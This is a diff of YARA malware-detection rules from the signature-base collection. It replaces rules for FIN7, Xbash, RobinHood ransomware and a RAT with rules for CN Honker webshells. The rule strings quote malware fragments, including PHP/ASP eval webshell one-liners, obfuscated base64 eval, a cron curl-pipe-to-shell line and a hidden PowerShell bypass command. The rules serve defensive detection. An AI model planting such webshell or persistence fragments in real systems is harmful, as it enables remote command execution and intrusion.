 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "d0f059ba21f06021579835a55220d1e822d1233f95879ea6f7cb9d301408c821"
-		hash1 = "1952fa94b582e9af9dca596b5e51c585a78b8b1610639e3b878bbfa365e8e908"
-		hash2 = "d8fdcdaad652c19f4f4676cd2f89ae834dbc19e2759a206044b18601875f2726"
-		hash3 = "e2e6ed82703de21eb4c5885730ba3db42f3ddda8b94beb2ee0c3af61bc435747"
-		hash4 = "03641e5632673615f23b2a8325d7355c4499a40f47b6ae094606a73c56e24ad0"
 
 	strings:
-		$s0 = "autorun.exe" fullword
-		$s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; MSIE 6.0; Windows NT 5.1; .NET CL"
-		$s2 = "%drp.exe" fullword
-		$s3 = "%s_%s%d.exe" fullword
-		$s4 = "open=autorun.exe" fullword
-		$s5 = "http://www.microsoft.com/en-us/default.aspx" fullword
-		$s10 = "error.renamefile" fullword
-		$s12 = "insufficient lookahead" fullword
-		$s13 = "%s %s|" fullword
-		$s16 = ":\\autorun.exe" fullword
+		$s0 = "eval(gzinflate(base64_decode('" ascii
+		$s1 = "B1ac7Sky-->" fullword ascii
 
 	condition:
-		7 of them and uint16( 0 ) == 0x5A4D
+		filesize < 641KB and all of them
 }
-rule SIGNATURE_BASE_Explosive_UA : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp3 : FILE
 {
 	meta:
-		description = "Explosive Malware Embedded User Agent - Volatile Cedar APT http://goo.gl/HQRCdw"
+		description = "Webshell from CN Honker Pentest Toolset - file asp3.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d88d5fd6-adf9-5ced-8b79-e47e3ffbde50"
-		date = "2015-04-03"
+		id = "0cb01c07-b424-532d-8aef-5ec25dfe3f19"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/HQRCdw"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L90-L104"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L162-L177"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9ed7fedcf9cda868803c8ace393e08709a747b909178e19cdbb1b116edbb82f9"
-		score = 60
+		hash = "87c5a76989bf08da5562e0b75c196dcb3087a27b"
+		logic_hash = "e5f30a445be30c491e669c633bf2df08cbfb1017ecfc91f9ed83275550488304"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "Mozilla/4.0 (compatible; MSIE 7.0; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)" fullword
+		$s1 = "if shellpath=\"\" then shellpath = \"cmd.exe\"" fullword ascii
+		$s2 = "c.open \"GET\", \"http://127.0.0.1:\" & port & \"/M_Schumacher/upadmin/s3\", Tru" ascii
 
 	condition:
-		$x1 and uint16( 0 ) == 0x5A4D
+		filesize < 444KB and all of them
 }
-rule SIGNATURE_BASE_Webshell_Caterpillar_ASPX
+rule SIGNATURE_BASE_CN_Honker_Webshell_ASPX_Sniff : FILE
 {
 	meta:
-		description = "Volatile Cedar Webshell - from file caterpillar.aspx"
+		description = "Webshell from CN Honker Pentest Toolset - file sniff.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9af48c64-3768-5765-8245-38df000598a7"
-		date = "2015-04-03"
+		id = "8cf47d71-1b97-5967-ad70-2ea6fad7cc29"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "http://goo.gl/emons5"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_volatile_cedar.yar#L106-L126"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L179-L194"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9df2e4a25052136d6e622273f917bd15df410869a8cf3075c773a14ea62a2a55"
-		score = 75
+		hash = "e246256696be90189e6d50a4ebc880e6d9e28dfd"
+		logic_hash = "198442e75422055e7d65c5d1aef55819036a99077aa79dbd5006ba97c4fe4af8"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "af4c99208fb92dc42bc98c4f96c3536ec8f3fe56"
 
 	strings:
-		$s0 = "Dim objNewRequest As WebRequest = HttpWebRequest.Create(sURL)" fullword
-		$s1 = "command = \"ipconfig /all\"" fullword
-		$s3 = "For Each xfile In mydir.GetFiles()" fullword
-		$s6 = "Dim oScriptNet = Server.CreateObject(\"WSCRIPT.NETWORK\")" fullword
-		$s10 = "recResult = adoConn.Execute(strQuery)" fullword
-		$s12 = "b = Request.QueryString(\"src\")" fullword
-		$s13 = "rw(\"<a href='\" + link + \"' target='\" + target + \"'>\" + title + \"</a>\")" fullword
+		$s1 = "IPHostEntry HosyEntry = Dns.GetHostEntry((Dns.GetHostName()));" fullword ascii
+		$s2 = "if (!logIt && my_s_smtp && (dport == 25 || sport == 25))" fullword ascii
 
 	condition:
-		all of them
+		filesize < 91KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Webmonitor_RAT : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Udf_Udf : FILE
 {
 	meta:
-		description = "Detects WebMonitor RAT"
+		description = "Webshell from CN Honker Pentest Toolset - file udf.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5378f22e-4bba-50e7-8374-5135e980e06b"
-		date = "2018-04-13"
+		id = "07252f2d-1a99-5f21-940d-899a4821b511"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_webmonitor_rat.yar#L1-L34"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L196-L211"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fbf6368527a7bd841b7679d668d6b77ce720fd0f6bcbd5fa9ff6301ae72199ec"
-		score = 75
+		hash = "df63372ccab190f2f1d852f709f6b97a8d9d22b9"
+		logic_hash = "c7db32b5e66601e0b8322ac67b6b9ba8d6222891ed01db557bfac9985140421a"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "27aaad8a7b3fd53d99077a9202e8bed05696c843ed2485bea6eb9e33a1c273ac"
-		hash2 = "05111c305028b5d822ecd12de9879560223c42860cc9d448c47886c236648607"
 
 	strings:
-		$x1 = "send_keylog_stream_start" fullword wide
-		$x2 = "KEYLOG_STREAM_STOP" fullword wide
-		$s1 = "SHELL_EXEC" fullword wide
-		$s2 = "send_shell_exec" fullword wide
-		$s3 = "send_connections_get" fullword wide
-		$a1 = "Select * from Win32_PerfRawData_PerfProc_Process where IDProcess = '" fullword wide
-		$a2 = "Select * from Win32_Process WHERE handle =" fullword wide
-		$a3 = "Select * from Win32_Process where ProcessId=" fullword wide
-		$a4 = "Select * from Win32_ComputerSystem" fullword wide
-		$a5 = "The service is in the process of being continued" fullword wide
-		$a6 = "tcpdump" fullword wide
-		$a7 = "memdump" fullword wide
-		$a8 = "<val1>Processor</val1>" fullword wide
-		$a9 = "Win32 share process" fullword wide
+		$s1 = "<?php // Source  My : Meiam  " fullword ascii
+		$s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or ( 2 of ( $s* ) and 2 of ( $a* ) ) or 7 of them )
+		filesize < 430KB and all of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_Robinhood_May19_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_JSP_Jsp : FILE
 {
 	meta:
-		description = "Detects RobinHood Ransomware"
+		description = "Webshell from CN Honker Pentest Toolset - file jsp.html"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7199c0de-c925-5399-8fa6-852604190a21"
-		date = "2019-05-15"
+		id = "46f2fb10-2c0c-5bc2-b3bb-eba4c74bcad7"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/BThurstonCPTECH/status/1128489465327030277"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_robinhood.yar#L2-L21"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L213-L228"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5eef71b94f2488dceff80ec2daba689c12d13b2742ba9ae5ead58711339d6026"
-		score = 75
+		hash = "c58fed3d3d1e82e5591509b04ed09cb3675dc33a"
+		logic_hash = "089e1a553900d149a4087ac81254295d74de15d9baaf73e60ce4f061e450e8c7"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "21cb84fc7b33e8e31364ff0e58b078db8f47494a239dc3ccbea8017ff60807e3"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = ".enc_robbinhood" ascii
-		$s2 = "c:\\windows\\temp\\pub.key" ascii fullword
-		$s3 = "cmd.exe /c net use * /DELETE /Y" ascii
-		$s4 = "sc.exe stop SQLAgent$SQLEXPRESS" nocase
-		$s5 = "main.EnableShadowFucks" nocase
-		$s6 = "main.EnableRecoveryFCK" nocase
-		$s7 = "main.EnableLogLaunders" nocase
-		$s8 = "main.EnableServiceFuck" nocase
+		$s1 = "<input name=f size=30 value=shell.jsp>" fullword ascii
+		$s2 = "<font color=red>www.i0day.com  By:" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 8000KB and 1 of them
+		filesize < 3KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Xbash_PY_Sep18 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_T00Ls_Lpk_Sethc_V4_Mail : FILE
 {
 	meta:
-		description = "Detects Xbash malware"
+		description = "Webshell from CN Honker Pentest Toolset - file mail.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "97512fe8-002f-5cbc-a915-d55c087fbef7"
-		date = "2018-09-18"
+		id = "2f7d8a4d-9d94-5f23-9768-cc3712678d93"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_xbash.yar#L13-L25"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L230-L245"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d686c42e6bf440507735f846463f2df5fbf4f7bd5f5656883655a5278a1fc252"
-		score = 75
+		hash = "0a9b7b438591ee78ee573028cbb805a9dbb9da96"
+		logic_hash = "b835a6d0c736116e0a8b277dadbf25c2ac333b0d7937a6f67ed59887c610a57a"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = { 73 58 62 61 73 68 00 00 00 00 00 00 00 00 }
+		$s1 = "if (!$this->smtp_putcmd(\"AUTH LOGIN\", base64_encode($this->user)))" fullword ascii
+		$s2 = "$this->smtp_debug(\"> \".$cmd.\"\\n\");" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 10000KB and 1 of them
+		filesize < 39KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Xbash_SH_Sep18 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Phpwebbackup : FILE
 {
 	meta:
-		description = "Detects Xbash malware"
+		description = "Webshell from CN Honker Pentest Toolset - file phpwebbackup.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "450ef15f-fe9c-5809-9077-457a43326bfe"
-		date = "2018-09-18"
-		modified = "2023-01-06"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_xbash.yar#L27-L48"
+		id = "eb737ea6-231c-5e8d-b976-75f1044f9f54"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L247-L262"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b48cbd64002025d861e2fd381be5a68efd7f6fc5fd239850c940f887e2b01673"
-		score = 75
+		hash = "c788cb280b7ad0429313837082fe84e9a49efab6"
+		logic_hash = "45452fc415fbafe170a1b1f5a58df40f0ec65a9a6678e675b40a8c54e2d8bd6c"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af"
-		hash2 = "de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "echo \"*/5 * * * * curl -fsSL" fullword ascii
-		$s2 = ".sh|sh\" > /var/spool/cron/root" ascii
-		$s3 = "#chmod +x /tmp/hawk" fullword ascii
-		$s4 = "if [ ! -f \"/tmp/root.sh\" ]" fullword ascii
-		$s5 = ".sh > /tmp/lower.sh" ascii
-		$s6 = "chmod 777 /tmp/root.sh" fullword ascii
-		$s7 = "-P /tmp && chmod +x /tmp/pools.txt" fullword ascii
-		$s8 = "-C /tmp/pools.txt>/dev/null 2>&1" ascii
+		$s0 = "<?php // Code By isosky www.nbst.org" fullword ascii
+		$s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
 
 	condition:
-		uint16( 0 ) == 0x2123 and filesize < 3KB and 1 of them
+		uint16( 0 ) == 0x3f3c and filesize < 67KB and all of them
 }
-rule SIGNATURE_BASE_MAL_Xbash_JS_Sep18 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Dz_Phpcms_Phpbb : FILE
 {
 	meta:
-		description = "Detects XBash malware"
+		description = "Webshell from CN Honker Pentest Toolset - file dz_phpcms_phpbb.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e891d146-f92d-5144-a1f2-ad308e309870"
-		date = "2018-09-18"
-		modified = "2023-01-06"
-		reference = "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_xbash.yar#L50-L66"
+		id = "f7e5413f-a7c9-51d4-8422-30c3e2462be2"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L264-L281"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cf2f9006e0ab07f6ff1a0ce4946af34468f7c74143c853c5d77c6db725bb590a"
-		score = 75
+		hash = "33f23c41df452f8ca2768545ac6e740f30c44d1f"
+		logic_hash = "1455df58f51c3ae7558b89c940d97ea5870f261217b2a09727bb6678bcbd5500"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "var path=WSHShell" fullword ascii
-		$s2 = "var myObject= new ActiveXObject(" ascii
-		$s3 = "window.resizeTo(0,0)" fullword ascii
-		$s4 = "<script language=\"JScript\">" fullword ascii
+		$s1 = "if($pwd == md5(md5($password).$salt))" fullword ascii
+		$s2 = "function test_1($password)" fullword ascii
+		$s3 = ":\".$pwd.\"\\n---------------------------------\\n\";exit;" fullword ascii
+		$s4 = ":user=\".$user.\"\\n\";echo \"pwd=\".$pwd.\"\\n\";echo \"salt=\".$salt.\"\\n\";" fullword ascii
 
 	condition:
-		filesize < 5KB and 3 of them
+		filesize < 22KB and all of them
 }
-
-rule SIGNATURE_BASE_SUSP_Fake_AMSI_DLL_Jun23_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Picloaked_1 : FILE
 {
 	meta:
-		description = "Detects an amsi.dll that has the same exports as the legitimate one but very different contents or file sizes"
-		author = "Florian Roth"
-		id = "b12df9de-ecfb-562b-b599-87fa786a33bc"
-		date = "2023-06-07"
-		modified = "2023-06-12"
-		reference = "https://twitter.com/eversinc33/status/1666121784192581633?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_fake_amsi_dll.yar#L3-L35"
+		description = "Webshell from CN Honker Pentest Toolset - file 1.gif"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2ff44c4a-ed97-5635-9926-8d54a8364fab"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L283-L299"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ec3db233ab22144bc65614b45bb894a7ea5a4fd40ccb603e6e52cc1b9ff8805b"
-		score = 65
+		hash = "3eab1798cbc9ab3b2c67d3da7b418d07e775db70"
+		logic_hash = "a816ac9e98b7c5208f075ffcb9a6525016d6a5c468005d78ecab90d651423705"
+		score = 70
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "Microsoft.Antimalware.Scan.Interface" ascii
-		$a2 = "Amsi.pdb" ascii fullword
-		$a3 = "api-ms-win-core-sysinfo-" ascii
-		$a4 = "Software\\Microsoft\\AMSI\\Providers" wide
-		$a5 = "AmsiAntimalware@" ascii
-		$a6 = "AMSI UAC Scan" ascii
-		$fp1 = "Wine builtin DLL"
+		$s0 = "<?php eval($_POST[" ascii
+		$s1 = ";<%execute(request(" ascii
+		$s3 = "GIF89a" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.exports ( "AmsiInitialize" ) and pe.exports ( "AmsiScanString" ) ) and ( filesize > 200KB or filesize < 35KB or not 4 of ( $a* ) ) and not 1 of ( $fp* )
+		filesize < 6KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_FIN7_Strings_Aug18_1
+rule SIGNATURE_BASE_CN_Honker_Webshell_Assembly : FILE
 {
 	meta:
-		description = "Detects strings from FIN7 report in August 2018"
+		description = "Webshell from CN Honker Pentest Toolset - file assembly.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b940986-e41b-5fbf-9e42-cb0fd550e541"
-		date = "2018-08-01"
+		id = "7639e81d-fe21-5a12-9a20-fe894eefef73"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L13-L30"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L301-L315"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "89d2f8f28a7ab0e78c53d8c41b45efa60cfa9ff72306c49197f52342d9a3c546"
-		score = 75
+		hash = "2bcb4d22758b20df6b9135d3fb3c8f35a9d9028e"
+		logic_hash = "34dc47b2f91a15a62175f3cab88d5ff24d2a3aa62f74fb9e43a4aaae96ced999"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b6354e46af0d69b6998dbed2fceae60a3b207584e08179748e65511d45849b00"
 
 	strings:
-		$s1 = "&&call %a01%%a02% /e:jscript" ascii
-		$s2 = "wscript.exe //b /e:jscript %TEMP%" ascii
-		$s3 = " w=wsc@ript /b " ascii
-		$s4 = "@echo %w:@=%|cmd" ascii
-		$s5 = " & wscript //b /e:jscript"
+		$s0 = "response.write oScriptlhn.exec(\"cmd.exe /c\" & request(\"c\")).stdout.readall" fullword ascii
 
 	condition:
-		1 of them
+		filesize < 1KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_Sample_Aug18_2 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php8 : FILE
 {
 	meta:
-		description = "Detects FIN7 malware sample"
+		description = "Webshell from CN Honker Pentest Toolset - file php8.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "885eebfe-2587-5744-ba0c-c74ced946050"
-		date = "2018-08-01"
+		id = "8b25b7f3-b94e-5887-b102-b52d340a4316"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L32-L49"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L317-L334"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a46492383db5af8f60984b42c53a792632f836f1668fca2d564e0f1f1ed313f2"
-		score = 75
+		hash = "b7b49f1d6645865691eccd025e140c521ff01cce"
+		logic_hash = "435ceb72c082f702284c464979a907a59a42bb4aa07311f9b2da1a9831efac11"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1513c7630c981e4b1d0d5a55809166721df4f87bb0fac2d2b8ff6afae187f01d"
 
 	strings:
-		$x1 = "Description: C:\\Users\\oleg\\Desktop\\" wide
-		$x2 = "/*|*| *  Copyright 2016 Microsoft, Industries.|*| *  All rights reserved.|*|" ascii
-		$x3 = "32, 40, 102, 105, 108, 101, 95, 112, 97, 116, 104, 41, 41, 32" ascii
-		$x4 = "83, 108, 101, 101, 112, 40, 51, 48, 48, 48, 41, 59, 102, 115" ascii
-		$x5 = "80, 80, 68, 65, 84, 65, 37, 34, 41, 44, 115, 104, 101, 108, 108" ascii
+		$s0 = "<a href=\"http://hi.baidu.com/ca3tie1/home\" target=\"_blank\">Ca3tie1's Blog</a" ascii
+		$s1 = "function startfile($path = 'dodo.zip')" fullword ascii
+		$s3 = "<form name=\"myform\" method=\"post\" action=\"\">" fullword ascii
+		$s5 = "$_REQUEST[zipname] = \"dodozip.zip\"; " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 2000KB and 1 of them
+		filesize < 25KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_FIN7_Maldoc_Aug18_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Xx : FILE
 {
 	meta:
-		description = "Detects malicious Doc from FIN7 campaign"
+		description = "Webshell from CN Honker Pentest Toolset - file xx.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f3c430e0-be9a-5c3f-9378-a20ef0492afb"
-		date = "2018-08-01"
+		id = "72a04950-b82d-516f-a376-5253b7de1158"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L51-L64"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L336-L352"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f3ecf77a5f909361f4a6af5ca0f25ec85721570587500a8ce2ef203158472e47"
-		score = 75
+		hash = "2f39f1d9846ae72fc673f9166536dc21d8f396aa"
+		logic_hash = "67c542f172fd1b97fbee4697fd42bab9486e3d779ce62993617e5a5205bd75d4"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9c12591c850a2d5355be0ed9b3891ccb3f42e37eaf979ae545f2f008b5d124d6"
 
 	strings:
-		$s1 = "<photoshop:LayerText>If this document was downloaded from your email, please click  \"Enable editing\" from the yellow bar above" ascii
+		$s0 = "$mysql.=\"insert into `$table`($keys) values($vals);\\r\\n\";" fullword ascii
+		$s2 = "$mysql_link=@mysql_connect($mysql_servername , $mysql_username , $mysql_password" ascii
+		$s16 = "mysql_query(\"SET NAMES gbk\");" fullword ascii
 
 	condition:
-		filesize < 800KB and 1 of them
+		filesize < 2KB and all of them
 }
-rule SIGNATURE_BASE_APT_FIN7_Sample_Aug18_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Webshell_JSPMSSQL : FILE
 {
 	meta:
-		description = "Detects FIN7 samples mentioned in FireEye report"
+		description = "Webshell from CN Honker Pentest Toolset - file JSPMSSQL.txt"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0fdd98e8-7536-5159-8085-da7388e5fff2"
-		date = "2018-08-01"
+		id = "061c1e53-edd0-5838-8d0f-6fb8f4fa078a"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L66-L93"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_webshells.yar#L354-L369"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5ff078f8cb93a841b68521cfbc120b18952c7ff5b56ab2f3b0eebf63a10aa572"
-		score = 75
+		hash = "c6b4faecd743d151fe0a4634e37c9a5f6533655f"
+		logic_hash = "c08e69345cb09e41840a81dcd8a015f9e1be93d570b64c310be74631e5314e2f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a1e95ac1bb684186e9fb5c67f75c7c26ddc8b18ebfdaf061742ddf1675e17d55"
-		hash2 = "dc645aae5d283fa175cf463a19615ed4d16b1d5238686245574d8a6a8b0fc8fa"
-		hash3 = "eebbce171dab636c5ac0bf0fd14da0e216758b19c0ce2e5c572d7e6642d36d3d"
 
 	strings:
-		$s1 = "\\par var console=\\{\\};console.log=function()\\{\\};" ascii
-		$s2 = "616e64792d7063" ascii
-		$x1 = "0043003a005c00550073006500720073005c0061006e00640079005c004400650073006b0074006f0070005c0075006e00700072006f0074006500630074" ascii
-		$x2 = "780065006300750074006500280022004f006e0020004500720072006f007200200052006500730075006d00650020004e006500780074003a0073006500" ascii
-		$x3 = "\\par \\tab \\tab \\tab sh.Run \"powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -w Hidden -File \" & pToPSCb, 0, False" fullword ascii
